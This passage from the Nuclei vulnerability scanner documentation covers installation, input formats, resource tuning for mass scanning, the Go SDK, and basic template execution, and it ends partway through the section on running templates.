Review more details about the project [through GitHub](https://github.com/projectdiscovery/nuclei-templates) or [reach out to us on Discord.](https://discord.com/servers/projectdiscovery-community-695645237418131507)
## Usage
Question and answers about using Nuclei.
Nuclei can be installed with several different options including: Go, Brew, and Dccoker. Check out [the Nuclei install page](/tools/nuclei/install) for details on all of the options.
Nuclei supports the following type of modules.
* [HTTP](/templates/protocols/http/)
* [DNS](/templates/protocols/dns/)
* [TCP](/templates/protocols/network/)
* [HEADLESS](/templates/protocols/headless/)
* [JAVASCRIPT](/templates/protocols/javascript/)
* [CODE](/templates/protocols/code/)
* [FILE](/templates/protocols/file/)
Nuclei can detect security vulnerabilities in **Web Applications**, **Networks**, **DNS** based misconfiguration, and **Secrets scanning** in source code or in files on the local file system.
In addition, you can now connect your Nuclei setup to ProjectDiscovery Cloud Platform (PDCP) to view your scans. [Check out more information](/cloud/introduction) on PDCP Free and our upcoming Teams release.
To learn more about Nuclei templates, check out [the GitHub repository](https://github.com/projectdiscovery/nuclei-templates), or and [explore additional documentation here](templates/introduction).
After detecting a security issue **we always recommend that you validate it a second time** before reporting it.
**To validate:**
If you have both a vulnerable target and template, rerun the template with `-debug` flag to inspect the output against the expected matcher defined in the template. Use this to confirm the identified vulnerability.
Once you confirm the result, report it!
By default, Nuclei will make several thousand requests (both HTTP protocol and other services) against a single target when running **all nuclei-templates**.
This is the result of running over 3500 templates (*with an active and growing template library*).
By default, [the following templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) are excluded from default scans.
We consider two factors for “safety” within the context of Nuclei.
* The traffic Nuclei creates against the target
* The impact templates have on the target
**Traffic**
Nuclei usually makes fewer HTTP requests than the number of templates selected for a scan due to its intelligent request reduction.
While some templates contain multiple requests, this rule holds true across most scan configurations.
**Templates**
The library of Nuclei templates houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system ([see the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)).
To ensure these templates are not run accidentally they are tagged and excluded from the default scan. These templates can be only executed when explicitly invoked using the `-itags` option.
Nuclei is an open-source project distributed under the [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md).
Please join our [Discord server](https://discord.gg/projectdiscovery), or contact us via [Twitter](http://twitter.com/pdnuclei).
## Troubleshooting
Questions and answers about troubleshooting scenarios for Nuclei.
Nuclei uses templates to scan for potential vulnerabilities. These templates are files that contain information on identifying certain types of vulnerabilities.
Think of the templates as a building blueprint. On its own a blueprint cannot cause harm, as it only describes how a building or construct (in this example, a vulnerability) can be built or identified.
**For example:**
* `Webshell.Generic.118` is a template to check for the vulnerability CVE-2017-12615, which is a specific vulnerability in some versions of Apache Tomcat.
* `Backdoor.Generic.LinuxTsunami` is a template that can identify the infamous Linux Tsunami backdoor if it were present on a system.
* `kingdee-erp-rce.yaml` is a template designed to identify a remote code execution vulnerability in Kingdee ERP software.
These files are being flagged as **malware** by anti-malware solutions because they contain patterns that match known vulnerabilities.
It's similar to a textbook on viruses being detected as an actual virus.
Remember, these templates can't "harm" your computer, they are not executing any malicious code on your system.
However, if used as part of a vulnerability scanning process against an insecure system, they could help identify weaknesses.
Headless mode on machines based on Linux (OS or containers, eg. Docker) might face runtime errors due to missing dependencies related to specific OS-shared libraries used by chrome binary.
Usually, these errors can be fixed by pre-installing the browser on the specific distribution. Here is a list of the steps needed for the most common distributions.
Ubuntu
With snap:
```sh
sudo snap install chromium
```
Without snap:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
In case you are unable to install the browser, or want to install only the minimum required dependencies, run the following command:
```
sudo apt-get install libnss3 libgconf-2-4
```
If you encounter an error similar to "libnss3.so: cannot open shared object file: No such file or directory," try running the following command to install the dev version:
```
sudo apt-get install libnss3-dev
```
Error type examples:
```
Error: Expected nil, but got: &errors.errorString{s:"[launcher] Failed to launch the browser, the doc might help https://go-rod.github.io/#/compatibility?id=os: /root/.cache/rod/browser/chromium-1018003/chrome-linux/chrome: error while loading shared libraries: libnss3.so: cannot open shared object file: No such file or directory\n"}
```
```
could not create browser
```
```
Command '/usr/bin/chromium-browser' requires the chromium snap to be installed.
Please install it with:
snap install chromium
```
## Other FAQs
Check out the [Nuclei Template FAQ](/templates/faq) for more questions and answers about templates.
# Supported Input Formats
Source: https://docs.projectdiscovery.io/tools/nuclei/input-formats
Learn about supported input formats in Nuclei and how to use them
Input Formats supported by Nuclei can be grouped into two categories:
* **List Type**: Input formats that can be specified as a list of items (ex: URLs, IPs, CIDRs, ASN, etc.)
* **Http Request Type**: Input formats that contain a complete HTTP request and cannot be expressed as a list of items (ex: OpenAPI Schema, Proxify Traffic Logs, etc.)
### List Type
List type formats can be specified in the following ways:
1. **`-u` flag**:
Comma Separated list of values (ex: `-u scanme.sh,127.0.0.1,AS1337,192.168.1.0/24`)
2. **`-l` flag**:
File containing list of values (ex: `-l urls.txt`)
3. **via stdin (or pipe)**:
List of values can be passed via stdin (ex: `cat urls.txt | nuclei`) or piped from other tools (ex: `mytool | nuclei`)
The following are the list type formats supported by Nuclei:
* **URLs**: A URL, for example `https://projectdiscover.io`
* **IPs**: Ipv4 or Ipv6 address, for example `127.0.0.1` or `2001:0db8:85a3:0000:0000:8a2e:0370:7334`
* **CIDRs**: CIDR range, for example `192.168.1.0/24`
* **ASNs**: Autonomous System Number, for example `AS1337`
* **Domains**: Domain or Subdomain name, for example `projectdiscovery.io`
### HTTP Request Type
Due to nature of these formats, they can only be specified via file using `-l` flag and the format of the file needs to be passed via `-input-mode` flag
```
nuclei -l [format-file] -input-mode [format]
```
These formats can be classified into two types based on their usage:
* **API Specification**:
Companies/Developers write API specification for their **RESTful APIs** in various formats with standard being **OpenAPI**. These specifications are used for multiple purposes like documentation, testing, code generation etc.
**Nuclei with v3.2.0** uses these specifications to generate HTTP requests and test them against the target.
Nuclei supports **OpenAPI** and **Swagger** specifications but other formats like postman can be converted to OpenAPI formats and used with nuclei.
For example, using **OpenAPI** schema in nuclei is as simple as:
```
nuclei -l openapi.yaml -im openapi
```
Nuclei also does extra validations when generating requests and accepts inputs and variables when generating requests. Refer tp [openapi-validations](#openapi-validation) for more details.
* **Request-Response Logs generated by applications**
Many applications generate logs of requests and responses for debugging and monitoring purposes. These logs can be used by Nuclei to find vulnerabilities in the application.
Nuclei supports many popular formats WakeLockSentinel
* **Burp Suite Saved Items**: One can export request response items from burp suite in xml format and use it with Nuclei.
* **Proxify Traffic Logs**: [Proxify](https://github.com/projectdiscovery/proxify) by ProjectDiscovery exports logs in **JSONL** or **YAML-MultiDoc** format which are supported by nuclei.
**Others**:
Output of any application that either exports logs or can be converted to logs in `JSONL` or `YAML-MultiDoc` specification of Proxify can be used with Nuclei.
This means output of tools like [Katana](/tools/katana/) , [Httpx](/tools/httpx/) etc. can be used with nuclei.
If you want to add support for a new format, please create a Pull Request to [nuclei](https://github.com/projectdiscovery/nuclei).
### OpenAPI Validation
When generating requests from an OpenAPI schema, Nuclei performs validations to ensure that the generated requests are valid and prompts for missing inputs and variables.
```bash
nuclei -h target-format
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
```
* **`-ro` flag**:
Parameters defined in OpenAPI schema can be optional or required. When `-ro` flag is used, Nuclei will only use required parameters and ignore optional parameters.
* **`-sfv` flag**:
When `-sfv` flag is used, nuclei will skip any and all requests that have missing parameters
**Default Behavior**:
* **Missing Auth**:
If a given OpenAPI schema requires authentication, Nuclei will exit with missing parameters required for auth. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[FTL] openapi: missing global auth parameter: X-API-Key
```
These missing parameters can be passed using `-vars` flag. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -vars "X-API-Key=123"
```
* **Missing Required Variables**:
By default, when Nuclei finds a request with optional parameters, if available it uses them or skips those parameters. For missing required parameters, Nuclei will halt with an error. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
If the same command is run with `-v` flag (verbose mode), Nuclei will also log skipped optional parameters. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[VER] openapi: skipping optional param (scan_ids) in (query) in request [GET] /results/filters due to missing value (scan_ids)
[VER] openapi: skipping optional param (severity) in (query) in request [GET] /results/filters due to missing value (severity)
...
[VER] openapi: skipping optional param (template) in (query) in request [GET] /results/filters due to missing value (template)
[VER] openapi: skipping optional param (host) in (query) in request [GET] /results/filters due to missing value (host)
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
These missing parameters can be passed using `-vars` flag or by **temporarily** specifiying them in auto-generated `required_openapi_params.yaml` file.
This file is generated in the current working directory when Nuclei halts due to missing parameters. Here's an example auto-generated `required_openapi_params.yaml` file
```yaml
var:
- user_id=
- id=
- ip=
# Optional parameters
# - host=
# - name=
# - not_host=
# - not_severity=
# - not_template=
# - scan_ids=
# - search=
# - severity=
# - template=
# - vuln_status=
```
One can specify these missing parameters in `required_openapi_params.yaml` file and it will be automatically picked up by Nuclei. If you prefer to specify these missing parameters using `-vars` flag, you can do so as well.
The Auto-generated `required_openapi_params.yaml` is meant for temporary use and it will be **deprecated** in next release as we move towards our goal of **ProjectDiscovery Standard Authentication Across Tools** using `secret` file
* **Placeholder Parameter Values**
When Nuclei finds any request that has optional parameters and the `-ro` flag is not used, it will use placeholder values depending on the data type of the parameter. For example:
If a parameter is of type `string` then it will use `string` as placeholder value, same goes for other known types including timestamps and datatypes.
# Installing Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/install
Learn about how to install and get started with Nuclei
```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```
Nuclei requires the latest **GO** version to install successfully.
```bash
brew install nuclei
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/nuclei:latest
```
Docker-specific usage instructions can be found [here](./running#running-with-docker).
```bash
git clone https://github.com/projectdiscovery/nuclei.git; \
cd nuclei/cmd/nuclei; \
go build; \
mv nuclei /usr/local/bin/; \
nuclei -version;
```
Nuclei require the latest **GO** version to install successfully.
```bash
https://github.com/projectdiscovery/nuclei/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
```bash
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/helm
helm upgrade --install nuclei . -f values.yaml
```
This Helm chart creates two primary resources (intended to be configured via `values.yaml`):
* A Kubernetes CronJob to run Nuclei on a defined schedule
* An [Interactsh](https://github.com/projectdiscovery/interactsh) service for Nuclei to use
# Mass Scanning with Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/mass-scanning-cli
Running Nuclei through the CLI on hundreds of targets
## What is **Mass Scanning?**
Mass scanning in the context of Nuclei means running the Nuclei CLI on more than 100 targets. While Nuclei works out-of-the-box for running scans on any number of targets - we recommend learning more to understand
the resource requirements for running Nuclei in different scenarios and how to properly adjust flags and options to avoid overutilization of resources and to get the best performance.
## Overutilization of Resources
If flags and available options are not properly configured, Nuclei can overutilize resources and can cause following issues:
* OOM Killed by the system
* Hangs and crashes
* Error code 137 etc
## Understanding How Nuclei Consumes Resources
Nuclei is a highly concurrent tool that has major Network I/O due to nature of the tool. There is a direct correlation between concurrency and memory usage.
**max-requests**
`max-requests` is a metadata field under info section of template that contains maximum number of outgoing requests this template can make.
**Below are some flags and options that directly affect the resource utilization of Nuclei:**
* **-c or -concurrency**
This flag controls concurrency/parallelism of two components/operations in Nuclei and its default value is 25.
1. Number of templates to run in parallel at a time (IN Template-Spray/Default mode/strategy)
Number of templates to run in parallel per target (IN Host-Spray mode/strategy)
2. Number of Requests to send in parallel per template
Ex: Some template have `payloads` field in template and usually sends multiple requests. This concurrency per template is controlled by `threads: 10` value in template
But if `threads` is not defined or missing (since it is optional), then nuclei will use `-c` value to decide concurrency of requests per template
* **-bs or -bulk-size**
This flag controls concurrency/parallelism of targets in Nuclei and its default value is 25.
IN Host-Spray mode/strategy, this flag controls maximum number of targets to run in parallel at a time
IN Template-Spray/Default mode/strategy, this flag controls maximum number of targets to run in parallel for each template
* **-hbs and -headc**
`-hbs` (-headless-bulk-size) and `-headc` (-headless-concurrency) flags are variants of `-bs` and `-c` flags specifically for headless templates since headless templates are resource intensive and run a headless browser in background.
* **-jsc or -js-concurrency**
(Introduced in v3.1.8) This flag controls maximum number of javascript runtimes to run in parallel at a time. Javascript runtimes are used in templates with `flow` field and javascript protocol
Although javascript templates are few compared to http templates, but this provides a way to control the resource utilization of javascript templates.
Default value of this flag is 120 and is tested to be optimal with minimal resource utilization (Note: Nuclei by default reuses javascript runtimes to avoid overhead of creating new runtimes for each request)
* **-pc or -payload-concurrency**
(Introduced in v3.2.0) This flag controls maximum number of payloads to run in parallel for each template. This flag is only applicable to templates with `payloads` field and does not have `threads` field set, default of this flag is 25 and can be updated as per requirement
* **-rl or -rate-limit**
This flag controls the global rate limit of http requests in nuclei and its default value is 150 requests per second.
Note: Setting Low/Very Low value of this flag directly affects speed (RPS) and Memory Usage of Nuclei since ratelimit is applied just before sending requests but at this point the requests are already prepared and are in memory waiting to be sent
* **-rlm or -rate-limit-minute**
Alternative to `-rl` flag, this flag controls the global rate limit of http requests in nuclei but in terms of requests per minute (Not used as default and is mutually exclusive with `-rl` flag)
* **-ss or -scan-strategy**
This flag controls the strategy of scanning targets and its default value is `auto`
1. `auto` is currently a placeholder for `template-spray` strategy
2. `template-spray` strategy can be understood as stealthy mode of scanning and does not aggressively scan a single target. Instead of running all templates on single target it runs a template on multiple targets thereby reducing the load on single target without compromising the speed of scanning
3. `host-spray` strategy can be understood as more of a focused mode of scanning where it runs all templates on single target before moving to next target
Although difference might not seem significant but in reality this plays a major role in resource utilization and speed of scanning. Ex: `template-spray` strategy is more stealthy but consumes more memory than `host-spray` since input/target chunk is different for each template contrary to `host-spray` strategy where input/target chunk is same for all templates
This flag only decides strategy of scanning and uses concurrency specified by `-c` and `-bs` flags
**Note**: `host-spray` strategy currently does not support resume feature due to complexity of implementation
* **-rsr or -response-size-read**
This flag controls the maximum response size of http response that nuclei should read and its default value is 4MB (max).
Ex: If a endpoint/targets returns a response of 100MB(a zip file or something) then nuclei will only read first 4MB of response to avoid DOS as data read is stored in memory
This plays a major role in Memory Usage of Nuclei because at any moment heap memory of Nuclei is `1-1.5x x (concurrency * response-size-read)`
* **-stream**
Instead of probing all input urls and then proceeding with scan (default behavior), this flag continiously stream inputs to nuclei instead of waiting for probe to finish
It was observed that this flag may lead to high memory usage when running in `template-spray` strategy as there is a Marshal/Unmarshal overhead is involved and each template has different copy of input/target chunk
## Recommendations for Optimizing Resource Usage
Currently, here is no out-of-the-box solution to optimize Nuclei automatically for mass scanning. Understanding the proper use of flags and options can help in optimizing Nuclei for mass scanning.
In general, here are some recommendations to optimize Nuclei for mass scanning:
* Prefer `host-spray` strategy when possible
* Do not constraint GC (Garbage Collection) by setting low memory limits if possible. Nuclei (just like go standard http library) focuses on reusing memory than freeing it and allocating it again. This is why Nuclei like other Go tools does not have high fluctuation in memory usage and either increases or decreases memory usage gradually
* Properly adjust `-c` , `-bs` and `-rl` flags after understanding requirement and capabilities of your own system as well as targets you are scanning
* Although Nuclei can handle any number of targets we recommended batching targets based on targets or system capabilities
## Feature-based Optimizations for Mass Scanning
* **-timeout**
Timeout controls the maximum time Nuclei should wait for a response (current default is 10 sec for http 6 \* -timout value for code protocol)
This flag depends on your targets and the network conditions. Setting a low value might cause false negatives and setting a high value might cause high memory usage and slow down the scanning process.
* **-retries**
Retries controls the maximum number of retries Nuclei should attempt for a request (current default is 1)
This flag is useful when you are scanning targets with unstable network conditions. Setting a high value might cause high memory usage and slow down the scanning process.
* **-mhe or -max-host-error**
This flag controls the maximum number of (network type) errors to allow per host before removing the unresponsive host from the scan (current default is 30)
* **-nmhe or -no-max-host-error**
This flag disables the behavior of removing unresponsive hosts from the scan when they reach maximum number of errors (current default is 30)
Note: This flag directly affects the speed and memory usage of Nuclei since it keeps unresponsive hosts in memory and retries them.
## Reporting Performance Issues
Unlike other type of issues, Performance Issue require more information and a different kind of information to debug and fix this issue. Hence it is recommended to report performance issues with following information:
* Nuclei Version (if not latest then try with latest version)
* System Information (OS, Memory, CPU)
* Target Count and Template Count
* Above mentioned flags and options used especially -c, -bs, -rl, -ss
* Any other flags and options used
Above information will help in understanding if the issue is due to misconfiguration or due to a bug in nuclei. If Issue is of a more complex nature like memory leak then application profiles need to be collected and shared in the issue description
Profiling can be enabled in nuclei using `PPROF=1` environment variable and also accepts addition option `PPROF_TIME=10s` using these two env variables will enable profiling and snapshot of cpu profile and memory profile will be collected and store in appropriate directories every 10 seconds(PPROF\_TIME). For addition options about profiling refer to [nuclei-pprof](https://github.com/projectdiscovery/utils/tree/main/pprof).
A good example of reporting performance issue like memory leak is [#4552](https://github.com/projectdiscovery/nuclei/issues/4552) .
## Maximize Your Nuclei Experience with PDCP
Building a Nuclei automation or running recurrent scans on more than 100 targets can be a challenging task without understanding Nuclei and experimenting with the flags and options.
One additional option is to consider evaluating ProjectDiscovery Cloud Platform or [PDCP](https://cloud.projectdiscovery.io). As a managed service it offers:
* All Scaling and Optimizations is abstracted
* Scans are distributed and requests are approriately chunked in a manner to Scale without False Negatives
PDCP includes many other helpful features for vulnerability scanning and ASM like Dashboard, Integrations, Reporting, Recurring Scans and much more
For more information on PDCP, Visit [PDCP](https://docs.projectdiscovery.io/cloud/introduction)
# Nuclei SDK
Source: https://docs.projectdiscovery.io/tools/nuclei/nuclei-sdk
Learn more about using the Nuclei SDK
## Nuclei SDK
Nuclei is primarily built as a CLI tool and typically optimizations and options are focused on improvements to the CLI. To address the increased usage of Nuclei from Go, we have introduced a revamped Go SDK of Nuclei in [v3.0.0](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/#sdk-4-all-revamped-go-sdk).
While the CLI is still the primary way to use Nuclei, additional documentation and an API reference along with examples are available at [pkg.go.dev](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3@v3.1.10/lib#section-readme).
> **Things to Note**:
>
> * Nuclei is still in active development, so breaking changes can be expected in the SDK. The team will continute to maintain the documentation to address changes as they are implementd.
> * Running Nuclei as a service may pose security risks. We recommended implementing Nuclei as a service with caution and additional security measures suited to your environment.
If you have questions, reach out to us through [Help](/help).
### Nuclei Version
Nuclei does not support an LTS version or a stable version. This is because Nuclei and templates function as a single unit and the Nuclei Engine will evolve to meet requirements and features to support writing new templates.
To ensure the best results we recommend keeping up to date with the latest version of the Nuclei SDK.
## Performance and Optimization
Optimal and resource efficient usage of the Nuclei SDK requires a thorough understanding of [How Nuclei Consumes Resources](/tools/nuclei/mass-scanning-cli#understanding-how-nuclei-consumes-resources). We also recommend understanding optimization based on multiple factors. Refer to [mass-scanning](/tools/nuclei/mass-scanning-cli) for more details on scanning for larger target quantities.
### General Suggestions for Usage
* Implement a `host-spray` strategy when possible
* Donot constraint GC (Garbage Collection) by setting low memory limits if possible. Nuclei(just like go standard http library) focuses on reusing memory than freeing it and allocating it again. This is why Nuclei, like other Go tools does not have high fluctuation in memory usage and either increases or decreases memory usage gradually
* Properly adjust `-c` , `-bs`, and `-rl` flags after understanding requirement and capabilities of your own system as well as targets you are scanning
* While Nuclei can handle any target quantity with the correct configuration, we recommended batching targets (based on target/system capabilities)
* Using Nuclei from SDK provides more control in terms of customization for what to run and how to run and we recommended a proper chunking strategy that takes all factors into account
* Since SDK still in active development, we recommend reviewing Nuclei capabilities, especially `tmplexec` and `core` package. Understanding the execution flow will give you more granular insights into how to optimize Nuclei for your use case
### Reporting Issues
After understanding all factors and optimization techniques mentioned in above linked documentation, if you are still facing performance issues like crash, memory leak etc then please report this issue with below details:
* Nuclei Version (if not latest please try with latest version before reporting)
* Target/Input Count
* Template Count
* Values of all flags mentioned in [mass-scanning](/tools/nuclei/mass-scanning-cli) documentation or actual code snippet containing the same
* Observed Memory Usage
* Type of Handler used (NucleiEngine or ThreadSafeNucleiEngine)
* Any other relevant details
For memory leak issues, debug profiles using [pprof](https://go.dev/blog/pprof) are required to properly diagnose the issue.
# Nuclei Overview
Source: https://docs.projectdiscovery.io/tools/nuclei/overview
A fast and customisable vulnerability scanner powered by simple YAML-based templates
## What is **Nuclei?**
Nuclei is a fast vulnerability scanner designed to probe modern applications, infrastructure, cloud platforms, and networks, aiding in the identification and mitigation of exploitable vulnerabilities.
At its core, Nuclei uses templates—expressed as straightforward YAML files, that delineate methods for detecting, ranking, and addressing specific security flaws.
Each template delineates a possible attack route, detailing the vulnerability, its severity, priority rating, and occasionally associated exploits. This template-centric methodology ensures Nuclei not only identifies potential threats, but pinpoints exploitable vulnerabilities with tangible real-world implications.
New to scanners and Nuclei? Try it out today with a quick example through our [Getting Started](/getstarted-overview).
## What are Nuclei's features?
| Feature | Description |
| ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| [Extensive Template Library](#) | Nuclei offers a vast collection of community-powered templates for targeted scans of various vulnerabilities and attack vectors. |
| [Versatile Target Specification](#) | Support for various target specification options, such as URLs, IP ranges, ASN range, and file input, allowing flexibility in defining the scanning scope. |
| [Bulk Scanning](#) | Perform bulk scanning by specifying multiple targets at once, enabling efficient scanning of a large number of assets or websites. |
| [Flexible Customization](#) | Customize scanning templates to fit specific needs, allowing tailored scanning and focusing on relevant security checks. |
| [Parallel Scanning](#) | Supports parallel scanning, reducing scanning time and improving efficiency, especially for large-scale targets. |
| [Comprehensive Reporting `cloud`](#) | Generates detailed reports with actionable insights, including vulnerability details, severity levels, affected endpoints, and suggested remediation steps. |
| [Integration with CI/CD Pipelines](#) | Seamlessly integrate Nuclei into CI/CD pipelines for automated security testing as part of the development and deployment process. |
| [CI/CD Integration `cloud`](#) | Actively maintained and developed by the ProjectDiscovery team, introducing new features, bug fixes, and enhancements to provide an up-to-date scanning framework. |
| [Ticketing integration `cloud`](#) | Two-way ticketing integration with Jira, Splunk, and many others to easily remediate and retest vulnerabilities. |
| [Customizable Output Format](#) | Configure the output format of Nuclei's scan results to suit your needs, including options for JSON, YAML, and more. |
| [Dynamic Variables](#) | Utilize dynamic variables in templates to perform parameterized scanning, enabling versatile and flexible scanning configurations. |
| [Inclusion and Exclusion Filters](#) | Apply inclusion and exclusion filters to specify targets, reducing scanning scope and focusing on specific areas of interest. |
| [Authentication Support](/tools/nuclei/authenticated-scans) | Nuclei supports various authentication mechanisms, including HTTP basic authentication, JWT token authentication, and more. |
| [Embedding custom code in templates](#) | Execute custom code within Nuclei templates to incorporate user-defined logic, perform advanced scanning actions, and more. |
| [AI-Powered Template Generation](#) | Generate and run vulnerability templates on-the-fly using natural language descriptions powered by ProjectDiscovery's AI capabilities. |
## How can I use Nuclei?
The global security community, including numerous researchers and engineers, actively contributes to the Nuclei template ecosystem. With over 6500 templates contributed thus far, Nuclei is continuously updated with real-world exploits and cutting-edge attack vectors.
Nuclei templates support scanning for critical issues such as the Log4j vulnerability and RCEs that impact vendors such as GitLab, Cisco, F5, and many others. Nuclei has dozens of use cases, including:
| Use Case | Description |
| ------------------------------------------ | --------------------------------------------------------------------------------------------- |
| Web Application Security | Identifies common web vulnerabilities with community-powered templates. |
| Infrastructure Security | Audits server configurations, open ports, and insecure services for security issues. |
| API Security Testing `alpha` | Tests APIs against known vulnerabilities and misconfigurations. |
| (CI/CD) Security | Integrates into CI/CD pipelines to minimize vulnerability resurface into production. |
| Third-party Vendor Assessment | Evaluates the security of third-party vendors by scanning their digital assets. |
| Cloud Security `alpha` | Scans cloud environments for misconfigurations and vulnerabilities. |
| Mobile Application Security | Scans mobile applications for security issues, including API tests and configuration checks. |
| Network Device Security `alpha` | Identifies vulnerabilities in network devices like routers, switches, and firewalls. |
| Web Server Assessment | Identifies common vulnerabilities and misconfigurations in web servers. |
| Content Management System (CMS) Assessment | Identifies vulnerabilities specific to CMS platforms like WordPress, Joomla, or Drupal. |
| Database Security Assessment | Scans databases for known vulnerabilities, default configurations, and access control issues. |
## Who is Nuclei for?
People use Nuclei in a variety of ways:
* **Security Engineers/Analysts**: Conduct security assessments, proactively identify vulnerabilities, convert custom vectors and analyze latest attack vectors.
* **Red Teams**: Leverage Nuclei as part of their offensive security operations to simulate real-world attack scenarios, identify weaknesses, and provide actionable recommendations for enhancing overall security.
* **DevOps Teams**: Integrate Nuclei into their CI/CD pipelines to ensure continuous security and regression of custom vulnerabilities.
* **Bug Bounty Hunters**: Leverage Nuclei to find vulnerabilities across their programs listed on platforms like HackerOne, Bugcrowd, Intigriti etc.
* **Penetration Testers**: Utilize Nuclei to automate their assessment methodologies into templates for their clients' systems.
### Security Engineers
Nuclei offers a number of features that are helpful for security engineers to customise workflows in their organization. With the varieties of scan capabilities (like DNS, HTTP, TCP), security engineers can easily create a suite of custom checks with Nuclei.
* Protocols support including: TCP, DNS, HTTP, File, etc
* Achieve complex vulnerability steps with workflows and [dynamic requests.](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
* Easily integrate into CI/CD, designed to be easily integrated into regression cycle to actively check the fix and re-appearance of vulnerability.
### Developers and Organizations
Nuclei is built with simplicity in mind and templates backed by hundreds of community members, it allows you to stay updated with the latest security threats using continuous Nuclei scanning on the hosts.
It is designed to be easily integrated into regression tests cycle, to verify fixes and eliminate future vulnerabilities.
* **CI/CD:** Engineers are already using Nuclei within their CI/CD pipeline, it allows them to constantly monitor their staging and production environments with customised templates.
* **Continuous Regression Cycle:** With Nuclei, you can create your custom template on every new identified vulnerability and put into Nuclei engine to eliminate in the continuous regression cycle.
### Bug Bounty Hunters
Nuclei allows a custom testing approach, supporting your own suite of checks to easily run across your bug bounty programs. In addition, Nuclei can be easily integrated into any continuous scanning workflow.
* Nuclei is easily integrated into other tool workflows
* Can process thousands of hosts in few minutes
* Easily automates your custom testing approach with our simple YAML DSL
Check our projects and tools to see what might fit into your bug bounty workflow: [github.com/projectdiscovery](http://github.com/projectdiscovery). We also host a daily [refresh of DNS data at Chaos](http://chaos.projectdiscovery.io).
### Penetration Testers
Nuclei can immensely improve how you approach security assessment by augmenting the manual, repetitive processes. Consultancies are already converting their manual assessment steps with Nuclei, it allows them to run set of their custom assessment approach across thousands of hosts in an automated manner.
Pen-testers get the full power public templates and customization capabilities to speed up their assessment process, particularly during the regression cycle where you can easily verify the fix.
* Easily create your compliance, standards suite (e.g. OWASP Top 10) checklist
* Use capabilities like [DAST](https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview) and [workflows](https://docs.projectdiscovery.io/templates/workflows/overview) to simplify complex manual steps and repetitive assessment through automated with Nuclei.
* Easy to re-test vulnerability-fix by just re-running the template.
# Running Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/running
Learn about how to run Nuclei and produce results
## How to Run Nuclei
Nuclei templates offer two primary execution methods:
### Supported Input Formats
Nuclei supports various input formats to run template against, including urls, hosts, ips, cidrs, asn, openapi, swagger, proxify, burpsuite exported data and more. To learn more on using input specify options, you can refer [nuclei input formats](/tools/nuclei/input-formats).
These inputs can be given to nuclei using `-l` and `-input-mode` flags.
```console
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
```
Executing nuclei against a list of inputs (urls, hosts, ips, cidrs, asn) is as simple as running the following command:
```bash
nuclei -l targets.txt
```
For running other input formats (burp, jsonl, yaml, openapi, swagger), you can use the `-im` flag to specify the input mode.
```bash
nuclei -l targets.burp -im burp
```
```bash
nuclei -l openapi.yaml -im openapi
```
and so on.
### Executing Nuclei Templates
`-t/templates`
**Default Templates**
Most community templates from our [nuclei-template repository](https://github.com/projectdiscovery/nuclei-templates) are executed by default, directly from the standard installation path. The typical command is as follows:
```sh
nuclei -u https://example.com
```
However, there are some exceptions regarding the templates that run by default:
* Certain tags and templates listed in the [default `.nuclei-ignore` file](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) are not included.
* [Code Templates](/templates/protocols/code) require the `-code` flag to execute.
* [Headless Templates](/templates/protocols/headless) will not run unless you pass the `-headless` flag.
* [Fuzzing Templates](/template/protocols/http/fuzzing-overview) will not run unless you pass the `-fuzz` flag.
You can also run templates against a list of URLs:
```sh
nuclei -list http_urls.txt
```
**Custom Templates**
To run a custom template directory or multiple directories, use the following command structure:
```sh
nuclei -u https://example.com -t cves/ -t exposures/
```
Templates from custom GitHub repositories, stored under the github directory, can be executed with this command:
```sh
